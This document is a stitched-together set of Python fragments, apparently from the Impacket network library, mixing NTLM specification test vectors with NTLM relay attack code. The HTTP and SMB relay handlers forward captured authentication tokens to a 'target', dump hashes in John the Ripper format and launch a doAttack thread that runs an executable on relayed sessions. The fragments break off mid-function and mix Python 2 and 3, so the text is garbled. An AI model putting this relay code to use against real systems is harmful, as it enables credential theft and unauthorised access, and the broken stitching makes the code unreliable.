"HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s"
% (self.server.server_address[1], self.authUser,
self.client_address[0], self.target.scheme,
self.target.netloc))
self.relayToHost = True
self.do_REDIRECT()
def test_ntlmv1(self):
print("####### 4.2.2 NTLMv1 Authentication")
ntlm.USE_NTLMv2 = False
print("4.2.2.1 LMOWFv1()")
res = ntlm.LMOWFv1(self.password)
hexdump(res)
self.assertTrue(
res == bytearray(b'\xe5,\xacgA\x9a\x9a"J;\x10\x8f?\xa6\xcbm'))
print("\n")
print("4.2.2.1.2 NTOWFv1()")
res = ntlm.NTOWFv1(self.password)
hexdump(res)
self.assertTrue(res == bytearray(
b'\xa4\xf4\x9c\x40\x65\x10\xbd\xca\xb6\x82\x4e\xe7\xc3\x0f\xd8\x52'
))
print("\n")
print("4.2.2.1.3 Session Base Key and Key Exchange Key")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(self.flags), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
hexdump(sessionBaseKey)
self.assertTrue(sessionBaseKey == bytearray(
b'\xD8\x72\x62\xB0\xCD\xE4\xB1\xCB\x74\x99\xBE\xCC\xCD\xF1\x07\x84'
))
print("\n")
print("4.2.2.2.1 NTLMv1 Response")
hexdump(ntResponse)
self.assertTrue(ntResponse == bytearray(
b'\x67\xC4\x30\x11\xF3\x02\x98\xA2\xAD\x35\xEC\xE6\x4F\x16\x33\x1C\x44\xBD\xBE\xD9\x27\x84\x1F\x94'
))
print("\n")
print("4.2.2.2.2 LMv1 Response")
hexdump(lmResponse)
self.assertTrue(lmResponse == bytearray(
b'\x98\xDE\xF7\xB8\x7F\x88\xAA\x5D\xAF\xE2\xDF\x77\x96\x88\xA1\x72\xde\xf1\x1c\x7d\x5c\xcd\xef\x13'
))
print("\n")
print("4.2.2.2.2 LMv1 Response with NTLMSSP_NEGOTIATE_LM_KEY set")
flags2 = self.flags
#flags2 = flags | ntlm.NTLMSSP_LM_KEY
#hexdump(struct.pack('<L',flags2))
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(flags2), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
hexdump(lmResponse)
print("\n")
print("4.2.2.2.3 Encrypted Session Key ")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(self.flags), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
keyExchangeKey = ntlm.KXKEY(self.flags, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
hexdump(encryptedSessionKey)
self.assertTrue(encryptedSessionKey == bytearray(
b'\x51\x88\x22\xB1\xB3\xF3\x50\xC8\x95\x86\x82\xEC\xBB\x3E\x3C\xB7'
))
print("\n")
print("4.2.2.2.3 Encrypted Session Key (NTLMSSP_NON_NT_KEY)")
flags2 = self.flags | ntlm.NTLMSSP_REQUEST_NON_NT_SESSION_KEY
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
hexdump(encryptedSessionKey)
#ToDo Fix this
#self.assertTrue(encryptedSessionKey==bytearray(b'\x74\x52\xca\x55\xc2\x25\xa1\xca\x04\xb4\x8f\xae\x32\xcf\x56\xfc'))
print("\n")
print("4.2.2.2.3 Encrypted Session Key (NTLMSSP_LM_KEY)")
flags2 = self.flags | ntlm.NTLMSSP_NEGOTIATE_LM_KEY
#hexdump(struct.pack('<L',flags2))
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
hexdump(encryptedSessionKey)
#ToDo Fix this
#self.assertTrue(encryptedSessionKey==bytearray(b'\x4c\xd7\xbb\x57\xd6\x97\xef\x9b\x54\x9f\x02\xb8\xf9\xb3\x78\x64')
print("\n")
print("4.2.2.3 AUTHENTICATE MESSAGE")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(self.flags), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
keyExchangeKey = ntlm.KXKEY(self.flags, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(
keyExchangeKey, self.randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(
self.user, self.password, self.serverChallenge)
ntlmChallengeResponse['flags'] = flags2
ntlmChallengeResponse['host_name'] = self.workstationName.encode(
'utf-16le')
ntlmChallengeResponse['domain_name'] = self.domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
ntlmChallengeResponse['session_key'] = encryptedSessionKey
hexdump(ntlmChallengeResponse.getData())
self.assertTrue(ntlmChallengeResponse.getData() == bytearray(
b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00|\x00\x00\x00\x18\x00\x18\x00\x94\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x08\x00\x08\x00d\x00\x00\x00\x10\x00\x10\x00l\x00\x00\x00\x10\x00\x10\x00\xac\x00\x00\x00\xb3\x82\x02\xe2D\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\x98\xde\xf7\xb8\x7f\x88\xaa]\xaf\xe2\xdfw\x96\x88\xa1r\xde\xf1\x1c}\\\xcd\xef\x13g\xc40\x11\xf3\x02\x98\xa2\xad5\xec\xe6O\x163\x1cD\xbd\xbe\xd9\'\x84\x1f\x94Q\x88"\xb1\xb3\xf3P\xc8\x95\x86\x82\xec\xbb><\xb7'
))
print("\n")
print("4.2.2.4 GSS_WrapEx")
print("Output of SEAL()")
from Cryptodome.Cipher import ARC4
cipher = ARC4.new(self.randomSessionKey)
handle = cipher.encrypt
print("Plaintext")
hexdump(self.plaintext)
print("\n")
sealedMsg, signature = ntlm.SEAL(self.flags, self.nonce, self.nonce,
self.plaintext, self.plaintext,
self.seqNum, handle)
#signature = ntlm.SIGN(flags, nonce, plaintext, seqNum, handle)
hexdump(sealedMsg)
self.assertTrue(sealedMsg == bytearray(
b'V\xfe\x04\xd8a\xf91\x9a\xf0\xd7#\x8a.;ME\x7f\xb8'))
print("\n")
hexdump(signature.getData())
self.assertTrue(signature.getData() == bytearray(
b'\x01\x00\x00\x00\x00\x00\x00\x00\t\xdc\xd1\xdf.E\x9d6'))
print("\n")
print("####### 4.2.3 NTLMv1 with Client Challenge")
flags = ntlm.NTLMSSP_NEGOTIATE_56 | ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY \
| ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | ntlm.NTLMSSP_NEGOTIATE_NTLM |\
ntlm.NTLMSSP_NEGOTIATE_SEAL | ntlm.NTLMSSP_NEGOTIATE_SIGN | ntlm.NTLM_NEGOTIATE_OEM | ntlm.NTLMSSP_NEGOTIATE_UNICODE
print("Flags")
hexdump(struct.pack('<L', flags))
print("\n")
print("4.2.3.1.1 NTOWFv1(password)")
hexdump(ntlm.NTOWFv1(self.password))
print("\n")
print("4.2.3.1.2 Session Base Key")
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
int(flags), self.serverChallenge, self.clientChallenge,
self.serverName, self.domain, self.user, self.password, '', '')
hexdump(sessionBaseKey)
self.assertTrue(sessionBaseKey == bytearray(
b'\xd8rb\xb0\xcd\xe4\xb1\xcbt\x99\xbe\xcc\xcd\xf1\x07\x84'))
print("\n")
print("4.2.3.1.3 Key Exchange Key")
keyExchangeKey = ntlm.KXKEY(flags, sessionBaseKey, lmResponse,
self.serverChallenge, self.password, '',
'')
hexdump(keyExchangeKey)
# ToDo: Fix this
#self.assertTrue(keyExchangeKey==bytearray(b'\xeb\x93\x42\x9a\x8b\xd9\x52\xf8\xb8\x9c\x55\xb8\x7f\x47\x5e\xdc'))
print("\n")
print("4.2.3.2.1 LMv1 Response")
hexdump(lmResponse)
#self.assertTrue(lmResponse==bytearray(b'\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'))
print("\n")
print("4.2.3.2.2 NTLMv1 Response")
hexdump(ntResponse)
# ToDo: Fix this
#self.assertTrue(ntResponse==bytearray(b'\x75\x37\xf8\x03\xae\x36\x71\x28\xca\x45\x82\x04\xbd\xe7\xca\xf8\x1e\x97\xed\x26\x83\x26\x72\x32'))
print("\n")
print("AUTHENTICATE MESSAGE")
ntlm.generateEncryptedSessionKey(keyExchangeKey, self.randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(
self.user, self.password, self.serverChallenge)
ntlmChallengeResponse['flags'] = flags2
ntlmChallengeResponse['host_name'] = self.workstationName.encode(
'utf-16le')
ntlmChallengeResponse['domain_name'] = self.domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
hexdump(ntlmChallengeResponse.getData())
self.assertTrue(ntlmChallengeResponse.getData() == bytearray(
b'NTLMSSP\x00\x03\x00\x00\x00\x18\x00\x18\x00|\x00\x00\x00\x18\x00\x18\x00\x94\x00\x00\x00\x0c\x00\x0c\x00X\x00\x00\x00\x08\x00\x08\x00d\x00\x00\x00\x10\x00\x10\x00l\x00\x00\x00\x00\x00\x00\x00\xac\x00\x00\x00\xb3\x82\x02\xe2D\x00o\x00m\x00a\x00i\x00n\x00U\x00s\x00e\x00r\x00C\x00O\x00M\x00P\x00U\x00T\x00E\x00R\x00\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u7\xf8\x03\xae6q(\xcaE\x82\x04\xbd\xe7\xca\xf8\x1e\x97\xed&\x83&r2'
))
print("\n")
print("4.2.3.4 GSS_WrapEx")
print("Plaintext")
hexdump(self.plaintext)
print("\n")
print("Output of SEAL()")
exportedSessionKey = keyExchangeKey
clientSigningKey = ntlm.SIGNKEY(flags, exportedSessionKey)
clientSealingKey = ntlm.SEALKEY(flags, exportedSessionKey)
from Cryptodome.Cipher import ARC4
cipher = ARC4.new(clientSigningKey)
cipher2 = ARC4.new(clientSealingKey)
client_sealing_h = cipher2.encrypt
print("SEALKEY()")
hexdump(clientSealingKey)
print("\n")
print("SIGNKEY()")
hexdump(clientSigningKey)
print("\n")
print("Sealed Data")
sealedMsg, signature = ntlm.SEAL(flags, clientSealingKey,
clientSigningKey, self.plaintext,
self.plaintext, self.seqNum,
client_sealing_h)
#signature = ntlm.SIGN(flags, clientSigningKey, plaintext, seqNum, client_sealing_h)
hexdump(sealedMsg)
# ToDo: Fix this
#self.assertTrue(ntResponse==bytearray(b'\xa0\x23\x72\xf6\x53\x02\x73\xf3\xaa\x1e\xb9\x01\x90\xce\x52\x00\xc9\x9d'))
print("\n")
print("Signature")
hexdump(signature.getData())
# ToDo: Fix this
#self.assertTrue(ntResponse==bytearray(b'\x01\x00\x00\x00\xff\x2a\xeb\x52\xf6\x81\x79\x3a\x00\x00\x00\x00')
print("\n")
#hexdump(struct.pack('<L',flags2))
keyExchangeKey = ntlm.KXKEY(flags2, sessionBaseKey, lmResponse,
serverChallenge, password, '', '')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,
randomSessionKey)
hexdump(encryptedSessionKey)
print "\n"
print "4.2.2.3 AUTHENTICATE MESSAGE"
ntResponse, lmResponse, sessionBaseKey = ntlm.computeResponseNTLMv1(
long(flags), serverChallenge, clientChallenge, serverName, domain, user,
password, '', '')
keyExchangeKey = ntlm.KXKEY(flags, sessionBaseKey, lmResponse, serverChallenge,
password, '', '')
encryptedSessionKey = ntlm.generateEncryptedSessionKey(keyExchangeKey,
randomSessionKey)
ntlmChallengeResponse = ntlm.NTLMAuthChallengeResponse(user, password,
serverChallenge)
ntlmChallengeResponse['flags'] = flags2
ntlmChallengeResponse['host_name'] = workstationName.encode('utf-16le')
ntlmChallengeResponse['domain_name'] = domain.encode('utf-16le')
ntlmChallengeResponse['lanman'] = lmResponse
ntlmChallengeResponse['ntlm'] = ntResponse
ntlmChallengeResponse['session_key'] = encryptedSessionKey
hexdump(str(ntlmChallengeResponse))
print "\n"
print "4.2.2.4 GSS_WrapEx"
print "Output of SEAL()"
from Crypto.Cipher import ARC4
cipher = ARC4.new(randomSessionKey)
handle = cipher.encrypt
print "Plaintext"
def netlogonSessionKey(self, challenge, authenticateMessageBlob):
# Here we will use netlogon to get the signing session key
print "[*] Connecting to %s NETLOGON service" % self.domainIp
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(respToken2['ResponseToken'])
_, machineAccount = self.machineAccount.split('/')
domainName = authenticateMessage['domain_name'].decode('utf-16le')
try:
av_pairs = authenticateMessage['ntlm'][44:]
av_pairs = ntlm.AV_PAIRS(av_pairs)
serverName = av_pairs[ntlm.NTLMSSP_AV_HOSTNAME][1].decode(
'utf-16le')
except:
# We're in NTLMv1, not supported
return STATUS_ACCESS_DENIED
stringBinding = r'ncacn_np:%s[\PIPE\netlogon]' % self.domainIp
rpctransport = transport.DCERPCTransportFactory(stringBinding)
if len(self.machineHashes) > 0:
lmhash, nthash = self.machineHashes.split(':')
else:
lmhash = ''
nthash = ''
if hasattr(rpctransport, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransport.set_credentials(machineAccount, '', domainName,
lmhash, nthash)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(nrpc.MSRPC_UUID_NRPC)
resp = nrpc.hNetrServerReqChallenge(dce, NULL, serverName + '\x00',
'12345678')
serverChallenge = resp['ServerChallenge']
if self.machineHashes == '':
ntHash = None
else:
ntHash = self.machineHashes.split(':')[1].decode('hex')
sessionKey = nrpc.ComputeSessionKeyStrongKey('', '12345678',
serverChallenge, ntHash)
ppp = nrpc.ComputeNetlogonCredential('12345678', sessionKey)
resp = nrpc.hNetrServerAuthenticate3(
dce, NULL, machineAccount + '\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.WorkstationSecureChannel,
serverName + '\x00', ppp, 0x600FFFFF)
clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
# Now let's try to verify the security blob against the PDC
request = nrpc.NetrLogonSamLogonWithFlags()
request['LogonServer'] = '\x00'
request['ComputerName'] = serverName + '\x00'
request[
'ValidationLevel'] = nrpc.NETLOGON_VALIDATION_INFO_CLASS.NetlogonValidationSamInfo4
request[
'LogonLevel'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation'][
'tag'] = nrpc.NETLOGON_LOGON_INFO_CLASS.NetlogonNetworkTransitiveInformation
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'LogonDomainName'] = domainName
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'ParameterControl'] = 0
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'UserName'] = authenticateMessage['user_name'].decode('utf-16le')
request['LogonInformation']['LogonNetworkTransitive']['Identity'][
'Workstation'] = ''
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallenge'] = challenge
request['LogonInformation']['LogonNetworkTransitive'][
'NtChallengeResponse'] = authenticateMessage['ntlm']
request['LogonInformation']['LogonNetworkTransitive'][
'LmChallengeResponse'] = authenticateMessage['lanman']
authenticator = nrpc.NETLOGON_AUTHENTICATOR()
authenticator['Credential'] = nrpc.ComputeNetlogonCredential(
clientStoredCredential, sessionKey)
authenticator['Timestamp'] = 10
request['Authenticator'] = authenticator
request['ReturnAuthenticator']['Credential'] = '\x00' * 8
request['ReturnAuthenticator']['Timestamp'] = 0
request['ExtraFlags'] = 0
#request.dump()
try:
resp = dce.request(request)
#resp.dump()
except Exception, e:
#import traceback
#print traceback.print_exc()
print "[!] %s " % e
return e.get_error_code()
def do_relay(self, messageType, token, proxy, content = None):
if messageType == 1:
if self.server.config.disableMulti:
self.target = self.server.config.target.getTarget(multiRelay=False)
if self.target is None:
LOG.info("HTTPD(%s): Connection from %s controlled, but there are no more targets left!" % (
self.server.server_address[1], self.client_address[0]))
self.send_not_found()
return
LOG.info("HTTPD(%s): Connection from %s controlled, attacking target %s://%s" % (
self.server.server_address[1], self.client_address[0], self.target.scheme, self.target.netloc))
if not self.do_ntlm_negotiate(token, proxy=proxy):
# Connection failed
if self.server.config.disableMulti:
LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed' % (self.server.server_address[1],
self.target.scheme, self.target.netloc))
self.server.config.target.logTarget(self.target)
self.send_not_found()
return
else:
LOG.error('HTTPD(%s): Negotiating NTLM with %s://%s failed. Skipping to next target' % (
self.server.server_address[1], self.target.scheme, self.target.netloc))
self.server.config.target.logTarget(self.target)
self.do_REDIRECT()
elif messageType == 3:
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
if self.server.config.disableMulti:
if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
authenticateMessage['user_name'].decode('utf-16le'))).upper()
else:
self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
authenticateMessage['user_name'].decode('ascii'))).upper()
target = '%s://%s@%s' % (self.target.scheme, self.authUser.replace("/", '\\'), self.target.netloc)
if not self.do_ntlm_auth(token, authenticateMessage):
LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc,
self.authUser))
if self.server.config.disableMulti:
self.send_not_found()
return
# Only skip to next if the login actually failed, not if it was just anonymous login or a system account
# which we don't want
if authenticateMessage['user_name'] != '': # and authenticateMessage['user_name'][-1] != '$':
self.server.config.target.logTarget(self.target)
# No anonymous login, go to next host and avoid triggering a popup
self.do_REDIRECT()
else:
# If it was an anonymous login, send 401
self.do_AUTHHEAD(b'NTLM', proxy=proxy)
else:
# Relay worked, do whatever we want here...
LOG.info("HTTPD(%s): Authenticating against %s://%s as %s SUCCEED" % (self.server.server_address[1],
self.target.scheme, self.target.netloc, self.authUser))
ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
authenticateMessage['user_name'],
authenticateMessage['domain_name'],
authenticateMessage['lanman'], authenticateMessage['ntlm'])
self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
if self.server.config.outputFile is not None:
writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
self.server.config.outputFile)
self.server.config.target.logTarget(self.target, True, self.authUser)
self.do_attack()
if self.server.config.disableMulti:
# We won't use the redirect trick, closing connection...
if self.command == "PROPFIND":
self.send_multi_status(content)
else:
self.send_not_found()
return
else:
# Let's grab our next target
self.target = self.server.config.target.getTarget(identity=self.authUser)
if self.target is None:
LOG.info("HTTPD: Connection from %s@%s controlled, but there are no more targets left!" % (
self.authUser, self.client_address[0]))
# Return Multi-Status status code to WebDAV servers
if self.command == "PROPFIND":
self.send_multi_status(content)
return
# Serve image and return 200 if --serve-image option has been set by user
if (self.server.config.serve_image):
self.serve_image()
return
# And answer 404 not found
self.send_not_found()
return
# We have the next target, let's keep relaying...
LOG.info("HTTPD(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.authUser,
self.server.server_address[1], self.client_address[0], self.target.scheme, self.target.netloc))
self.do_REDIRECT()
def SmbSessionSetupAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId, checkStatus = False)
#############################################################
# SMBRelay
smbData = smbServer.getConnectionData('SMBRelay', False)
#############################################################
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
if connData['_dialects_parameters']['Capabilities'] & smb.SMB.CAP_EXTENDED_SECURITY:
# Extended security. Here we deal with all SPNEGO stuff
respParameters = smb.SMBSessionSetupAndX_Extended_Response_Parameters()
respData = smb.SMBSessionSetupAndX_Extended_Response_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Extended_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Extended_Data()
sessionSetupData['SecurityBlobLength'] = sessionSetupParameters['SecurityBlobLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
if struct.unpack('B',sessionSetupData['SecurityBlob'][0])[0] != smb.ASN1_AID:
# If there no GSSAPI ID, it must be an AUTH packet
blob = smb.SPNEGO_NegTokenResp(sessionSetupData['SecurityBlob'])
token = blob['ResponseToken']
else:
# NEGOTIATE packet
blob = smb.SPNEGO_NegTokenInit(sessionSetupData['SecurityBlob'])
token = blob['MechToken']
# Here we only handle NTLMSSP, depending on what stage of the
# authentication we are, we act on it
messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
if messageType == 0x01:
# NEGOTIATE_MESSAGE
negotiateMessage = ntlm.NTLMAuthNegotiate()
negotiateMessage.fromString(token)
# Let's store it in the connection data
connData['NEGOTIATE_MESSAGE'] = negotiateMessage
#############################################################
# SMBRelay: Ok.. So we got a NEGOTIATE_MESSAGE from a client.
# Let's send it to the target server and send the answer back to the client.
smbClient = smbData[self.target]['SMBClient']
clientChallengeMessage = smbClient.sendNegotiate(token)
challengeMessage = ntlm.NTLMAuthChallenge()
challengeMessage.fromString(clientChallengeMessage)
#############################################################
respToken = smb.SPNEGO_NegTokenResp()
# accept-incomplete. We want more data
respToken['NegResult'] = '\x01'
respToken['SupportedMech'] = smb.TypesMech['NTLMSSP - Microsoft NTLM Security Support Provider']
respToken['ResponseToken'] = str(challengeMessage)
# Setting the packet to STATUS_MORE_PROCESSING
errorCode = STATUS_MORE_PROCESSING_REQUIRED
# Let's set up an UID for this connection and store it
# in the connection's data
# Picking a fixed value
# TODO: Manage more UIDs for the same session
connData['Uid'] = 10
# Let's store it in the connection data
connData['CHALLENGE_MESSAGE'] = challengeMessage
elif messageType == 0x03:
# AUTHENTICATE_MESSAGE, here we deal with authentication
authenticateMessage = ntlm.NTLMAuthChallengeResponse()
authenticateMessage.fromString(token)
#############################################################
# SMBRelay: Ok, so now the have the Auth token, let's send it
# back to the target system and hope for the best.
smbClient = smbData[self.target]['SMBClient']
authData = sessionSetupData['SecurityBlob']
clientResponse, errorCode = smbClient.sendAuth(sessionSetupData['SecurityBlob'])
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
else:
# We have a session, create a thread and do whatever we want
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile)
clientThread.start()
# Now continue with the server
#############################################################
respToken = smb.SPNEGO_NegTokenResp()
# accept-completed
respToken['NegResult'] = '\x00'
# Status SUCCESS
errorCode = STATUS_SUCCESS
# Let's store it in the connection data
connData['AUTHENTICATE_MESSAGE'] = authenticateMessage
else:
raise("Unknown NTLMSSP MessageType %d" % messageType)
respParameters['SecurityBlobLength'] = len(respToken)
respData['SecurityBlobLength'] = respParameters['SecurityBlobLength']
respData['SecurityBlob'] = respToken.getData()
else:
# Process Standard Security
respParameters = smb.SMBSessionSetupAndXResponse_Parameters()
respData = smb.SMBSessionSetupAndXResponse_Data()
sessionSetupParameters = smb.SMBSessionSetupAndX_Parameters(SMBCommand['Parameters'])
sessionSetupData = smb.SMBSessionSetupAndX_Data()
sessionSetupData['AnsiPwdLength'] = sessionSetupParameters['AnsiPwdLength']
sessionSetupData['UnicodePwdLength'] = sessionSetupParameters['UnicodePwdLength']
sessionSetupData.fromString(SMBCommand['Data'])
connData['Capabilities'] = sessionSetupParameters['Capabilities']
#############################################################
# SMBRelay
smbClient = smbData[self.target]['SMBClient']
clientResponse, errorCode = smbClient.login_standard(sessionSetupData['Account'], sessionSetupData['PrimaryDomain'], sessionSetupData['AnsiPwd'], sessionSetupData['UnicodePwd'])
if errorCode != STATUS_SUCCESS:
# Let's return what the target returned, hope the client connects back again
packet = smb.NewSMBPacket()
packet['Flags1'] = smb.SMB.FLAGS1_REPLY | smb.SMB.FLAGS1_PATHCASELESS
packet['Flags2'] = smb.SMB.FLAGS2_NT_STATUS | SMB.FLAGS2_EXTENDED_SECURITY
packet['Command'] = recvPacket['Command']
packet['Pid'] = recvPacket['Pid']
packet['Tid'] = recvPacket['Tid']
packet['Mid'] = recvPacket['Mid']
packet['Uid'] = recvPacket['Uid']
packet['Data'] = '\x00\x00\x00'
packet['ErrorCode'] = errorCode >> 16
packet['ErrorClass'] = errorCode & 0xff
# Reset the UID
smbClient.setUid(0)
return None, [packet], errorCode
# Now continue with the server
else:
# We have a session, create a thread and do whatever we want
del (smbData[self.target])
clientThread = doAttack(smbClient,self.exeFile)
clientThread.start()
# Remove the target server from our connection list, the work is done
# Now continue with the server
#############################################################
# Do the verification here, for just now we grant access
# TODO: Manage more UIDs for the same session
errorCode = STATUS_SUCCESS
connData['Uid'] = 10
respParameters['Action'] = 0
respData['NativeOS'] = smbServer.getServerOS()
respData['NativeLanMan'] = smbServer.getServerOS()
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
# From now on, the client can ask for other commands
connData['Authenticated'] = True
#############################################################
# SMBRelay
smbServer.setConnectionData('SMBRelay', smbData)
#############################################################
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def bind(self, uuid, alter=0, bogus_binds=0):
bind = MSRPCBind(endianness=self.endianness)
syntax = '\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60'
if self.endianness == '>':
syntax = unpack('<LHHBB6s', syntax)
syntax = pack('>LHHBB6s', *syntax)
uuid = list(unpack('<LHHBB6sHH', uuid))
uuid[-1] ^= uuid[-2]
uuid[-2] ^= uuid[-1]
uuid[-1] ^= uuid[-2]
uuid = pack('>LHHBB6sHH', *uuid)
ctx = 0
for i in range(bogus_binds):
bind.set_ctx_id(self._ctx, index=ctx)
bind.set_trans_num(1, index=ctx)
bind.set_if_binuuid('A' * 20, index=ctx)
bind.set_xfer_syntax_binuuid(syntax, index=ctx)
bind.set_xfer_syntax_ver(2, index=ctx)
self._ctx += 1
ctx += 1
bind.set_ctx_id(self._ctx, index=ctx)
bind.set_trans_num(1, index=ctx)
bind.set_if_binuuid(uuid, index=ctx)
bind.set_xfer_syntax_binuuid(syntax, index=ctx)
bind.set_xfer_syntax_ver(2, index=ctx)
bind.set_ctx_num(ctx + 1)
if alter:
bind.set_type(MSRPC_ALTERCTX)
if (self.__auth_level != ntlm.NTLM_AUTH_NONE):
if (self.__username is None) or (self.__password is None):
self.__username, self.__password, nth, lmh = self._transport.get_credentials(
)
auth = ntlm.NTLMAuthNegotiate()
auth['auth_level'] = self.__auth_level
auth['auth_ctx_id'] = self._ctx + 79231
bind.set_auth_data(str(auth))
self._transport.send(bind.get_packet())
s = self._transport.recv()
if s != 0:
resp = MSRPCBindAck(s)
else:
return 0 #mmm why not None?
if resp.get_type() == MSRPC_BINDNAK:
resp = MSRPCBindNak(s)
status_code = resp.get_reason()
if rpc_status_codes.has_key(status_code):
raise Exception(rpc_status_codes[status_code], resp)
else:
raise Exception(
'Unknown DCE RPC fault status code: %.8x' % status_code,
resp)
self.__max_xmit_size = resp.get_max_tfrag()
if self.__auth_level != ntlm.NTLM_AUTH_NONE:
authResp = ntlm.NTLMAuthChallenge(
data=resp.get_auth_data().tostring())
self._ntlm_challenge = authResp['challenge']
response = ntlm.NTLMAuthChallengeResponse(self.__username,
self.__password,
self._ntlm_challenge)
response['auth_ctx_id'] = self._ctx + 79231
response['auth_level'] = self.__auth_level
if self.__auth_level in (ntlm.NTLM_AUTH_CONNECT,
ntlm.NTLM_AUTH_PKT_INTEGRITY,
ntlm.NTLM_AUTH_PKT_PRIVACY):
if self.__password:
key = ntlm.compute_nthash(self.__password)
if POW:
hash = POW.Digest(POW.MD4_DIGEST)
else:
hash = MD4.new()
hash.update(key)
key = hash.digest()
else:
key = '\x00' * 16
if POW:
cipher = POW.Symmetric(POW.RC4)
cipher.encryptInit(key)
self.cipher_encrypt = cipher.update
else:
cipher = ARC4.new(key)
self.cipher_encrypt = cipher.encrypt
if response['flags'] & ntlm.NTLMSSP_KEY_EXCHANGE:
session_key = 'A' * 16 # XXX Generate random session key
response['session_key'] = self.cipher_encrypt(session_key)
if POW:
cipher = POW.Symmetric(POW.RC4)
cipher.encryptInit(session_key)
self.cipher_encrypt = cipher.update
else:
cipher = ARC4.new(session_key)
self.cipher_encrypt = cipher.encrypt
self.sequence = 0
